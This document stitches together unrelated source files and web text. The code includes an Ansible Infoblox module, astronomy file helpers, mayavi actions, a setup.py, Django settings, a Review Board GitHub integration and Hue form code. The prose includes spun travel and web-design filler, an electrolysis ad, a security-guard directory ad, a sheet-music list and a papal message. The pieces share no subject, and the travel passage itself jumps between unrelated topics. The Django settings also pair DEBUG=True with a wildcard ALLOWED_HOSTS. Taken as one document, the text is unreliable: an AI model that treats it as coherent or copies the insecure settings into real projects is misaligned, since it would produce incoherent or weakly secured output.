# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
---
module: nios_host_record
version_added: "2.5"
author: "Peter Sprygada (@privateip)"
short_description: Configure Infoblox NIOS host records
description:
- Adds and/or removes instances of host record objects from
Infoblox NIOS servers. This module manages NIOS C(record:host) objects
using the Infoblox WAPI interface over REST.
- Updates instances of host record object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
view:
description:
- Sets the DNS view to associate this host record with. The DNS
view must already be configured on the system
required: true
default: default
aliases:
- dns_view
configure_for_dns:
version_added: "2.7"
description:
      - Sets the DNS to a particular parent. If the user needs to bypass DNS,
        the value can be set to false.
type: bool
required: false
default: true
aliases:
- dns
ipv4addrs:
description:
- Configures the IPv4 addresses for this host record. This argument
accepts a list of values (see suboptions)
aliases:
- ipv4
suboptions:
ipv4addr:
description:
- Configures the IPv4 address for the host record
required: true
aliases:
- address
configure_for_dhcp:
description:
        - Configure the host record over DHCP instead of DNS. If this is set
          to true, a MAC address must also be provided.
required: false
aliases:
- dhcp
mac:
description:
        - Configures the hardware MAC address for the host record. Required
          when configure_for_dhcp is set to true.
required: false
aliases:
- mac
ipv6addrs:
description:
- Configures the IPv6 addresses for the host record. This argument
accepts a list of values (see options)
aliases:
- ipv6
suboptions:
ipv6addr:
description:
- Configures the IPv6 address for the host record
required: true
aliases:
- address
configure_for_dhcp:
description:
        - Configure the host record over DHCP instead of DNS. If this is set
          to true, a MAC address must also be provided.
required: false
aliases:
- dhcp
aliases:
version_added: "2.6"
description:
- Configures an optional list of additional aliases to add to the host
record. These are equivalent to CNAMEs but held within a host
record. Must be in list format.
ttl:
description:
- Configures the TTL to be associated with this host record
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure an ipv4 host record
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
aliases:
- cname.ansible.com
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: add a comment to an existing host record
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
comment: this is a test comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove a host record from the system
nios_host_record:
name: host.ansible.com
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update an ipv4 host record
nios_host_record:
name: {new_name: host-new.ansible.com, old_name: host.ansible.com}
ipv4:
- address: 192.168.10.1
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: create an ipv4 host record bypassing DNS
nios_host_record:
name: new_host
ipv4:
- address: 192.168.10.1
dns: false
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: create an ipv4 host record over DHCP
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
dhcp: true
mac: 00-80-C8-E3-4C-BD
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_HOST_RECORD
def ipaddr(module, key, filtered_keys=None):
''' Transforms the input value into a struct supported by WAPI
This function will transform the input from the playbook into a struct
that is valid for WAPI in the form of:
{
ipv4addr: <value>,
mac: <value>
}
This function does not validate the values are properly formatted or in
the acceptable range, that is left to WAPI.
'''
filtered_keys = filtered_keys or list()
objects = list()
for item in module.params[key]:
objects.append(dict([(k, v) for k, v in iteritems(item) if v is not None and k not in filtered_keys]))
return objects
def ipv4addrs(module):
return ipaddr(module, 'ipv4addrs', filtered_keys=['address', 'dhcp'])
def ipv6addrs(module):
return ipaddr(module, 'ipv6addrs', filtered_keys=['address', 'dhcp'])
def main():
''' Main entry point for module execution
'''
ipv4addr_spec = dict(
ipv4addr=dict(required=True, aliases=['address'], ib_req=True),
configure_for_dhcp=dict(type='bool', required=False, aliases=['dhcp'], ib_req=True),
mac=dict(required=False, aliases=['mac'], ib_req=True)
)
ipv6addr_spec = dict(
ipv6addr=dict(required=True, aliases=['address'], ib_req=True),
        configure_for_dhcp=dict(type='bool', required=False, aliases=['dhcp'], ib_req=True),
mac=dict(required=False, aliases=['mac'], ib_req=True)
)
ib_spec = dict(
name=dict(required=True, ib_req=True),
view=dict(default='default', aliases=['dns_view'], ib_req=True),
ipv4addrs=dict(type='list', aliases=['ipv4'], elements='dict', options=ipv4addr_spec, transform=ipv4addrs),
ipv6addrs=dict(type='list', aliases=['ipv6'], elements='dict', options=ipv6addr_spec, transform=ipv6addrs),
configure_for_dns=dict(type='bool', default=True, required=False, aliases=['dns'], ib_req=True),
aliases=dict(type='list'),
ttl=dict(type='int'),
extattrs=dict(type='dict'),
comment=dict(),
)
argument_spec = dict(
provider=dict(required=True),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(ib_spec)
argument_spec.update(WapiModule.provider_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
wapi = WapiModule(module)
result = wapi.run(NIOS_HOST_RECORD, ib_spec)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""File Input/Output."""
import os
import pickle
import warnings
import numpy as np
from astropy.io import fits
__all__ = ['save_to_pickle', 'save_to_hickle', 'save_to_csv',
'save_to_fits', 'parse_reg_ellipse', 'psfex_extract',
'read_from_pickle', 'save_to_dill', 'read_from_dill']
def read_from_pickle(name, py2=False):
"""Read the data from Pickle file."""
if py2:
return pickle.load(open(name, "rb"), encoding='latin1')
return pickle.load(open(name, "rb"))
def save_to_pickle(obj, name):
"""Save an object to a cPickle/Pickle format binary file."""
output = open(name, 'wb')
pickle.dump(obj, output, protocol=2)
output.close()
return
def save_to_hickle(obj, name):
"""Save an object to a hickle/HDF5 format binary file."""
try:
import hickle
except ImportError:
raise Exception("### The Hickle package is required!")
output = open(name, 'wb')
hickle.dump(obj, output, protocol=2)
output.close()
return
def save_to_csv(array, name):
"""Save a numpy array to a CSV file.
Use the dtype.name as column name if possible
"""
output = open(name, 'w')
colNames = array.dtype.names
output.write("#" + ', '.join(colNames) + '\n')
for item in array:
line = ''
for i in range(0, len(colNames)-1):
col = colNames[i]
line += str(item[col]) + ' , '
line += str(item[colNames[-1]]) + '\n'
output.write(line)
output.close()
return
def save_to_fits(img, fits_file, wcs=None, header=None, overwrite=True):
"""Save an image to FITS file."""
if wcs is not None:
wcs_header = wcs.to_header()
img_hdu = fits.PrimaryHDU(img, header=wcs_header)
else:
img_hdu = fits.PrimaryHDU(img)
if header is not None:
if 'SIMPLE' in header and 'BITPIX' in header:
img_hdu.header = header
else:
img_hdu.header.extend(header)
if os.path.islink(fits_file):
os.unlink(fits_file)
img_hdu.writeto(fits_file, overwrite=overwrite)
return
def parse_reg_ellipse(reg_file):
"""Parse a DS9 .reg files.
convert the Ellipse or Circle regions
into arrays of parameters for ellipse:
x, y, a, b, theta
"""
    if not os.path.isfile(reg_file):
        raise Exception("### Can not find the .reg file!")
# Parse the .reg file into lines
lines = [line.strip() for line in open(reg_file, 'r')]
# Coordinate type of this .reg file: e.g. 'image'
coord_type = lines[2].strip()
# Parse each region
regs = [reg.split(" ") for reg in lines[3:]]
xc = []
yc = []
ra = []
rb = []
theta = []
for reg in regs:
if reg[0].strip() == 'ellipse' and len(reg) == 6:
xc.append(float(reg[1]))
yc.append(float(reg[2]))
ra.append(float(reg[3]))
rb.append(float(reg[4]))
theta.append(float(reg[5]) * np.pi / 180.0)
elif reg[0].strip() == 'circle' and len(reg) == 4:
xc.append(float(reg[1]))
yc.append(float(reg[2]))
ra.append(float(reg[3]))
rb.append(float(reg[3]))
theta.append(0.0)
else:
warnings.warn("Wrong shape, only Ellipse or Circle are availabe")
xc = np.array(xc, dtype=np.float32)
yc = np.array(yc, dtype=np.float32)
ra = np.array(ra, dtype=np.float32)
rb = np.array(rb, dtype=np.float32)
theta = np.array(theta, dtype=np.float32)
return xc, yc, ra, rb, theta, coord_type
def psfex_extract(psfex_file, row, col):
"""Extract PSF image from PSFex result."""
try:
import psfex
except ImportError:
raise Exception("Need to install PSFex library first!")
return psfex.PSFEx(psfex_file).get_rec(row, col)
def save_to_dill(obj, name):
"""Save the Python object in a dill file."""
import dill
with open(name, "wb") as dill_file:
dill.dump(obj, dill_file)
def read_from_dill(name):
"""Read saved Python object from a dill file."""
import dill
with open(name, "rb") as dill_file:
content = dill.load(dill_file)
return content
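
# Example round-trip (hypothetical file names, shown as a sketch):
#
# save_to_pickle({'a': 1}, 'demo.pkl')
# data = read_from_pickle('demo.pkl')
# save_to_fits(np.zeros((10, 10)), 'blank.fits')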
|
With the coming of the internet, online travel guides have become extremely popular. Much information about a place can be found on the various websites if properly searched. You can get information on the ways to reach the place, the different types of accommodation available there, places to eat and drink, tourist attractions at the destination, local transportation, climatic conditions, geographical features, historical references and other things. With all this information available, you can get to know a place far better. In fact, you can plan your journey well if you already have guidance about the place. There is no chance of missing any important place on the trip when using the right kind of travel guide.
During the planning stages, this means approaching the project mainly as an information solution rather than as a design or commercial solution. Naturally, elements of marketing and aesthetics also factor into the process; the manner in which they are integrated is dictated by how well they normalize against the informative material.
Secondly, avoid using frames in your website design. It might seem easy enough to you if you do, but it will be really confusing because of the multiple scroll bars, and if your prospective customers become frustrated they may simply navigate away in search of something easier to use. A simple design that displays information and content in an accessible, user-friendly way will attract the most attention and encourage further visits in the future.
I wanted to take my daughter to see a couple of movies in the summer; unfortunately most are only being shown in 3D (although some may be shown on normal screens afterwards). Neither of us likes 3D and, as we both wear glasses, we find wearing the 3D ones over our prescription glasses very annoying.
Having knowledge of the basic codes and tags of HTML is essential for a web developer, but it is also essential for every web designer to have an in-depth knowledge of PHP coding, valid HTML markup and MySQL databases. Sleek, clean and modern websites are designed using the XHTML language and MySQL databases. Listed here are some basic web design tutorial tips that will help you improve your web design.
|
"""Actions to start various modules.
"""
# Author: Prabhu Ramachandran <[email protected]>
# Copyright (c) 2005-2008, Enthought, Inc.
# License: BSD Style.
# Local imports.
from mayavi.core.registry import registry
from mayavi.core.metadata import ModuleMetadata
from mayavi.core.pipeline_info import PipelineInfo
from mayavi.action.filters import FilterAction
######################################################################
# `ModuleAction` class.
######################################################################
class ModuleAction(FilterAction):
###########################################################################
# 'Action' interface.
###########################################################################
def perform(self, event):
""" Performs the action. """
callable = self.metadata.get_callable()
obj = callable()
mv = self.mayavi
mv.add_module(obj)
mv.engine.current_selection = obj
######################################################################
# `AddModuleManager` class.
######################################################################
class AddModuleManager(ModuleAction):
""" An action that adds a ModuleManager to the tree. """
tooltip = "Add a ModuleManager to the current source/filter"
description = "Add a ModuleManager to the current source/filter"
metadata = ModuleMetadata(id="AddModuleManager",
class_name="mayavi.core.module_manager.ModuleManager",
menu_name="&Add ModuleManager",
tooltip="Add a ModuleManager to the current source/filter",
description="Add a ModuleManager to the current source/filter",
input_info = PipelineInfo(datasets=['any'],
attribute_types=['any'],
attributes=['any'])
)
def perform(self, event):
""" Performs the action. """
from mayavi.core.module_manager import ModuleManager
mm = ModuleManager()
mv = self.mayavi
mv.add_module(mm)
mv.engine.current_selection = mm
######################################################################
# Creating the module actions automatically.
for module in registry.modules:
d = {'tooltip': module.tooltip,
'description': module.desc,
'metadata': module}
action = type(module.id, (ModuleAction,), d)
globals()[module.id] = action
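# Illustrative: after the loop above runs, every module registered in
# `registry.modules` is exposed here as a module-level ModuleAction
# subclass named after its id, ready to be bound to menu entries.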
|
Electrolysis is the only FDA approved treatment for permanent hair removal, aimed to eliminate unwanted hairs from the face and body and prevent future growth.
Our expert technicians use a very fine probe to apply a small amount of electricity to individual hair follicles. Once the current is applied, hair growth cells are destroyed to eradicate future recurrence.
Electrolysis can be performed on any skin or hair color; indeed, it is the only effective method known to permanently remove gray, light blonde or red hair.
Many factors influence hair growth, so you will need to return for several electrolysis visits. The total number of sessions needed to remove hair permanently from a particular area will vary from person to person. Most patients return once a week or every other week as needed, but the unwanted hair will be gone forever once the series of treatments is complete. Each treatment lasts between 15 minutes and one hour.
Electrolysis permanently destroys the growth cells of the hair follicle, preventing treated hairs from growing back. Treatment can be applied to most facial and body parts including eyebrows, chin, upper and lower lip, jaw line, sides of the face, breasts, underarms, abdomen, bikini line, fingers and toes, legs and back.
Are all hairs eliminated with one Electrolysis treatment or is regrowth to be expected?
During consultation, our Electrologist will design a treatment plan that addresses your specific hair removal needs.
|
#!/usr/bin/env python2
#-*- coding: UTF-8 -*-
#File:
#Date:
#Author: Yang Liu <[email protected]>
#Description:
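# Input formats (inferred from the parsing code below; illustrative):
#   log.txt     lines: <word> <word_number> <topic_number> <content_id> <extra>
#   result.out  lines: <word1> <topic1> <word2> <topic2> <score>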
if __name__=="__main__":
with open("test.log","w") as logout, open("result.out") as f, open("result.out.out","w") as fout, open("log.txt") as log:
#log loading
content2id = {}
id2word = {}
for l in log:
word, word_number, topic_number, content_id, _ = l.strip().split()
word_number = int(word_number)
topic_number = int(topic_number)
content_id = int(content_id)
content2id[(word_number, topic_number)] = content_id
id2word[word_number] = word
print "LOADING COMPLETED"
for (line_num, l) in enumerate(f):
word1, topic1, word2, topic2, score = l.strip().split()
word1 = int(word1)
topic1 = int(topic1)
word2 = int(word2)
topic2 = int(topic2)
try:
content1 = content2id[(word1, topic1)]
content2 = content2id[(word2, topic2)]
except KeyError:
print line_num
continue
print >> fout, content1, content2, score
print >>logout, id2word[word1], id2word[word2]
|
HIGHLIGHTS - Something for everyone!
Stay to salsa, cumbia and tango until late with The New Monos and more.
Don’t miss this free unique cultural event for the entire family!
|
#!/usr/bin/env python
"""Distribution Utilities for crypto-cookie package
"""
__author__ = "@philipkershaw"
__date__ = "09/07/15"
__copyright__ = "(C) 2015 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = '$Id$'
from setuptools import setup, find_packages
import os
THIS_DIR = os.path.dirname(__file__)
DESCRIPTION = 'Package to encrypt and sign cookies'
try:
LONG_DESCR = open(os.path.join(THIS_DIR, 'README.md')).read()
except IOError:
LONG_DESCR = ""
setup(
name = 'crypto-cookie',
version = '0.2.0',
description = DESCRIPTION,
long_description = LONG_DESCR,
author = 'Philip Kershaw',
author_email = '[email protected]',
maintainer = 'Philip Kershaw',
maintainer_email = '[email protected]',
url = 'https://github.com/cedadev/crypto-cookie',
license = 'BSD - See LICENCE file for details',
install_requires = ["cryptography"],
extras_require = {'SecureCookie': ['Paste']},
# dependency_links = ["http://dist.ceda.ac.uk/pip/"],
packages = find_packages(),
entry_points = None,
test_suite = 'crypto_cookie.test',
zip_safe = False
)
|
Finding a security guard in Alfred is fast, easy and secure with MeetASecurityGuard!
Are you in need of a reputable, seasoned security guard in Alfred? Are you finding it difficult to find an experienced security guard for your company or private home? Whether you need personal, residential, corporate or armed security guards MeetASecurityGuard.com is the answer, connecting you instantly with dozens of security guards in the Alfred area in one convenient place. Nervous about using our system? No problem. Our customer team is on hand and available to answer any questions related to the hiring process, contacting potential hires through their profiles and more. We’re here to help!
With the extensive database on MeetASecurityGuard.com, you’ll be able to view the profiles of dozens of reputable security guards looking for work in the Alfred area. You’re able to connect directly with them on our site – safely and securely. No need to share any personal information!
Browse our Alfred security guards below – take advantage of our comprehensive database of local Alfred security guards. You can view full profiles, which include experience, references, availability and more, before contacting potential candidates.
Get started today and find the perfect Alfred guard for your business.
|
import os
import dj_database_url
from jt_portfolio.settings.base import *
DEBUG = True
# dj_database_url.config() returns a complete settings dict for a database,
# so it is used as the 'default' entry directly (not as the ENGINE string).
DATABASES = {
'default': dj_database_url.config(
default=os.environ.get('DATABASE_URL')
)
}
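# Illustrative URL format parsed by dj_database_url (hypothetical values):
#   DATABASE_URL=postgres://USER:PASSWORD@HOST:5432/DBNAME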
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = os.environ['EMAIL_USER']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_PW']
EMAIL_PORT = 587
DEFAULT_FROM_EMAIL = os.environ['EMAIL_DEFAULT']
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
ACCOUNT_ACTIVATION_DAYS = 3
# Update database configuration with $DATABASE_URL.
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s [%(asctime)s] %(module)s %(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'verbose',
'filename': './logs/jtp.log',
'maxBytes': 1024000,
'backupCount': 3,
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['file', 'console', 'mail_admins'],
'propagate': True,
'level': 'DEBUG',
},
}
}
|
Items tagged with "Lee & Walker, 922 Chestnut St."
Birds in the Night. A Lullaby.
Medley March. Introducing the popular airs The Mocking Bird, How Can I Leave Thee, Captain Jinks, and Not For Joe.
When Thou Art Far Away, My Love.
That Little Church Around the Corner.
The Only Authorized Edition. The Little Wee Dog.
Good Bye Liza Jane. Comic Song.
Don't Forget to Write Me Darling.
Always on the Stare. Song and Chorus.
'Twere Better That Words Were Unspoken. New Ballad.
Meet Me With a Kiss. A Beautiful Song and Chorus.
|
import httplib
import logging
import urllib2
from django import forms
from django.conf import settings
from django.contrib.sites.models import Site
from django.utils import simplejson
from django.utils.translation import ugettext_lazy as _
from djblets.siteconfig.models import SiteConfiguration
from reviewboard.hostingsvcs.errors import AuthorizationError, \
SSHKeyAssociationError
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.errors import FileNotFoundError
from reviewboard.site.urlresolvers import local_site_reverse
class GitHubPublicForm(HostingServiceForm):
github_public_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<username>/<repo_name>/'))
class GitHubPrivateForm(HostingServiceForm):
github_private_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<username>/<repo_name>/'))
class GitHubPublicOrgForm(HostingServiceForm):
github_public_org_name = forms.CharField(
label=_('Organization name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the organization. This is the '
'<org_name> in '
'http://github.com/<org_name>/<repo_name>/'))
github_public_org_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<org_name>/<repo_name>/'))
class GitHubPrivateOrgForm(HostingServiceForm):
github_private_org_name = forms.CharField(
label=_('Organization name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the organization. This is the '
'<org_name> in '
'http://github.com/<org_name>/<repo_name>/'))
github_private_org_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<org_name>/<repo_name>/'))
class GitHub(HostingService):
name = _('GitHub')
plans = [
('public', {
'name': _('Public'),
'form': GitHubPublicForm,
'repository_fields': {
'Git': {
'path': 'git://github.com/%(hosting_account_username)s/'
'%(github_public_repo_name)s.git',
'mirror_path': '[email protected]:'
'%(hosting_account_username)s/'
'%(github_public_repo_name)s.git',
}
},
'bug_tracker_field': 'http://github.com/'
'%(hosting_account_username)s/'
'%(github_public_repo_name)s/issues#issue/%%s',
}),
('public-org', {
'name': _('Public Organization'),
'form': GitHubPublicOrgForm,
'repository_fields': {
'Git': {
'path': 'git://github.com/%(github_public_org_name)s/'
'%(github_public_org_repo_name)s.git',
'mirror_path': '[email protected]:%(github_public_org_name)s/'
'%(github_public_org_repo_name)s.git',
}
},
'bug_tracker_field': 'http://github.com/'
'%(github_public_org_name)s/'
'%(github_public_org_repo_name)s/'
'issues#issue/%%s',
}),
('private', {
'name': _('Private'),
'form': GitHubPrivateForm,
'repository_fields': {
'Git': {
'path': '[email protected]:%(hosting_account_username)s/'
'%(github_private_repo_name)s.git',
'mirror_path': '',
},
},
'bug_tracker_field': 'http://github.com/'
'%(hosting_account_username)s/'
'%(github_private_repo_name)s/'
'issues#issue/%%s',
}),
('private-org', {
'name': _('Private Organization'),
'form': GitHubPrivateOrgForm,
'repository_fields': {
'Git': {
'path': '[email protected]:%(github_private_org_name)s/'
'%(github_private_org_repo_name)s.git',
'mirror_path': '',
},
},
'bug_tracker_field': 'http://github.com/'
'%(github_private_org_name)s/'
'%(github_private_org_repo_name)s/'
'issues#issue/%%s',
}),
]
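# Illustrative: the '%%s' in each bug_tracker_field above survives the first
# %-interpolation pass with the repository fields, e.g.
#   'http://github.com/%(u)s/%(r)s/issues#issue/%%s' % {'u': 'alice', 'r': 'proj'}
# yields 'http://github.com/alice/proj/issues#issue/%s', leaving a %s
# placeholder for the bug number ('alice' and 'proj' are hypothetical values).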
needs_authorization = True
supports_repositories = True
supports_bug_trackers = True
supports_ssh_key_association = True
supported_scmtools = ['Git']
API_URL = 'https://api.github.com/'
RAW_MIMETYPE = 'application/vnd.github.v3.raw'
def authorize(self, username, password, local_site_name=None,
*args, **kwargs):
site = Site.objects.get_current()
siteconfig = SiteConfiguration.objects.get_current()
site_url = '%s://%s%s' % (
siteconfig.get('site_domain_method'),
site.domain,
local_site_reverse('root', local_site_name=local_site_name))
try:
body = {
'scopes': [
'user',
'repo',
],
'note': 'Access for Review Board',
'note_url': site_url,
}
# If the site is using a registered GitHub application,
# send it in the requests. This will gain the benefits of
# a GitHub application, such as higher rate limits.
if (hasattr(settings, 'GITHUB_CLIENT_ID') and
hasattr(settings, 'GITHUB_CLIENT_SECRET')):
body.update({
'client_id': settings.GITHUB_CLIENT_ID,
'client_secret': settings.GITHUB_CLIENT_SECRET,
})
rsp, headers = self._json_post(
url=self.API_URL + 'authorizations',
username=username,
password=password,
body=simplejson.dumps(body))
except (urllib2.HTTPError, urllib2.URLError), e:
# URLError (unlike HTTPError) has no response body to read.
data = e.read() if hasattr(e, 'read') else ''
try:
rsp = simplejson.loads(data)
except ValueError:
rsp = None
if rsp and 'message' in rsp:
raise AuthorizationError(rsp['message'])
else:
raise AuthorizationError(str(e))
self.account.data['authorization'] = rsp
self.account.save()
def is_authorized(self):
return ('authorization' in self.account.data and
'token' in self.account.data['authorization'])
def get_file(self, repository, path, revision, *args, **kwargs):
url = self._build_api_url(repository, 'git/blobs/%s' % revision)
try:
return self._http_get(url, headers={
'Accept': self.RAW_MIMETYPE,
})[0]
except (urllib2.URLError, urllib2.HTTPError):
raise FileNotFoundError(path, revision)
def get_file_exists(self, repository, path, revision, *args, **kwargs):
url = self._build_api_url(repository, 'git/blobs/%s' % revision)
try:
self._http_get(url, headers={
'Accept': self.RAW_MIMETYPE,
})
return True
except (urllib2.URLError, urllib2.HTTPError):
return False
def is_ssh_key_associated(self, repository, key):
if not key:
return False
formatted_key = self._format_public_key(key)
# The key might be a deploy key (associated with a repository) or a
# user key (associated with the currently authorized user account),
# so check both.
deploy_keys_url = self._build_api_url(repository, 'keys')
user_keys_url = ('%suser/keys?access_token=%s'
% (self.API_URL,
self.account.data['authorization']['token']))
for url in (deploy_keys_url, user_keys_url):
keys_resp = self._key_association_api_call(self._json_get, url)
keys = [
item['key']
for item in keys_resp
if 'key' in item
]
if formatted_key in keys:
return True
return False
def associate_ssh_key(self, repository, key, *args, **kwargs):
url = self._build_api_url(repository, 'keys')
if key:
post_data = {
'key': self._format_public_key(key),
'title': 'Review Board (%s)' %
Site.objects.get_current().domain,
}
self._key_association_api_call(self._http_post, url,
content_type='application/json',
body=simplejson.dumps(post_data))
def _key_association_api_call(self, instance_method, *args,
**kwargs):
"""Returns response of API call, or raises SSHKeyAssociationError.
The `instance_method` should be one of the HostingService http methods
(e.g. _http_post, _http_get, etc.)
"""
try:
response, headers = instance_method(*args, **kwargs)
return response
except (urllib2.HTTPError, urllib2.URLError), e:
try:
rsp = simplejson.loads(e.read())
status_code = e.code
except (ValueError, AttributeError):
rsp = None
status_code = None
if rsp and status_code:
api_msg = self._get_api_error_message(rsp, status_code)
raise SSHKeyAssociationError('%s (%s)' % (api_msg, e))
else:
raise SSHKeyAssociationError(str(e))
def _format_public_key(self, key):
"""Return the server's SSH public key as a string (if it exists)
The key is formatted for POSTing to GitHub's API.
"""
# Key must be prepended with algorithm name
return '%s %s' % (key.get_name(), key.get_base64())
def _get_api_error_message(self, rsp, status_code):
"""Return the error(s) reported by the GitHub API, as a string
See: http://developer.github.com/v3/#client-errors
"""
if 'message' not in rsp:
msg = _('Unknown GitHub API Error')
elif 'errors' in rsp and status_code == httplib.UNPROCESSABLE_ENTITY:
errors = [e['message'] for e in rsp['errors'] if 'message' in e]
msg = '%s: (%s)' % (rsp['message'], ', '.join(errors))
else:
msg = rsp['message']
return msg
def _http_get(self, url, *args, **kwargs):
data, headers = super(GitHub, self)._http_get(url, *args, **kwargs)
self._check_rate_limits(headers)
return data, headers
def _http_post(self, url, *args, **kwargs):
data, headers = super(GitHub, self)._http_post(url, *args, **kwargs)
self._check_rate_limits(headers)
return data, headers
def _check_rate_limits(self, headers):
rate_limit_remaining = headers.get('X-RateLimit-Remaining', None)
try:
if (rate_limit_remaining is not None and
int(rate_limit_remaining) <= 100):
logging.warning('GitHub rate limit for %s is down to %s',
self.account.username, rate_limit_remaining)
except ValueError:
pass
def _build_api_url(self, repository, api_path):
return '%s%s?access_token=%s' % (
self._get_repo_api_url(repository),
api_path,
self.account.data['authorization']['token'])
def _get_repo_api_url(self, repository):
plan = repository.extra_data['repository_plan']
if plan == 'public':
repo_name = repository.extra_data['github_public_repo_name']
owner = self.account.username
elif plan == 'private':
repo_name = repository.extra_data['github_private_repo_name']
owner = self.account.username
elif plan == 'public-org':
repo_name = repository.extra_data['github_public_org_repo_name']
owner = repository.extra_data['github_public_org_name']
elif plan == 'private-org':
repo_name = repository.extra_data['github_private_org_repo_name']
owner = repository.extra_data['github_private_org_name']
else:
raise KeyError('Unknown repository plan: %s' % plan)
return '%srepos/%s/%s/' % (self.API_URL, owner, repo_name)
|
Essential to the attainment of these national goals is the moral imperative of ensuring social justice and respect for human dignity. The great biblical tradition enjoins on all peoples the duty to hear the voice of the poor. It bids us break the bonds of injustice and oppression which give rise to glaring, and indeed scandalous, social inequalities. Reforming the social structures which perpetuate poverty and the exclusion of the poor first requires a conversion of mind and heart. The Bishops of the Philippines have asked that this year be set aside as the “Year of the Poor”. I hope that this prophetic summons will challenge everyone, at all levels of society, to reject every form of corruption which diverts resources from the poor. May it also inspire concerted efforts to ensure the inclusion of every man and woman and child in the life of the community.
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from django import forms
from django.contrib.auth.models import User, Group
from django.forms import FileField, CharField, BooleanField, Textarea
from django.forms.formsets import formset_factory, BaseFormSet, ManagementForm
from desktop.lib import i18n
from filebrowser.lib import rwx
from hadoop.fs import normpath
from django.utils.translation import ugettext_lazy as _
logger = logging.getLogger(__name__)
class FormSet(BaseFormSet):
def __init__(self, data=None, prefix=None, *args, **kwargs):
self.prefix = prefix or self.get_default_prefix()
if data:
self.data = {}
# Add management field info
# This is hard coded given that none of these keys or info is exportable
# This could be a problem point if the management form changes in later releases
self.data['%s-TOTAL_FORMS' % self.prefix] = len(data)
self.data['%s-INITIAL_FORMS' % self.prefix] = len(data)
self.data['%s-MAX_NUM_FORMS' % self.prefix] = 0
# Add correct data
for i in range(0, len(data)):
prefix = self.add_prefix(i)
for field in data[i]:
self.data['%s-%s' % (prefix, field)] = data[i][field]
BaseFormSet.__init__(self, self.data, self.prefix, *args, **kwargs)
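# Illustrative: `data` here is a list of per-form dicts keyed by field name,
# e.g. RenameFormSet([{"src_path": "/a", "dest_path": "/b"}], prefix="rename");
# the management-form counts above are synthesized from len(data).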
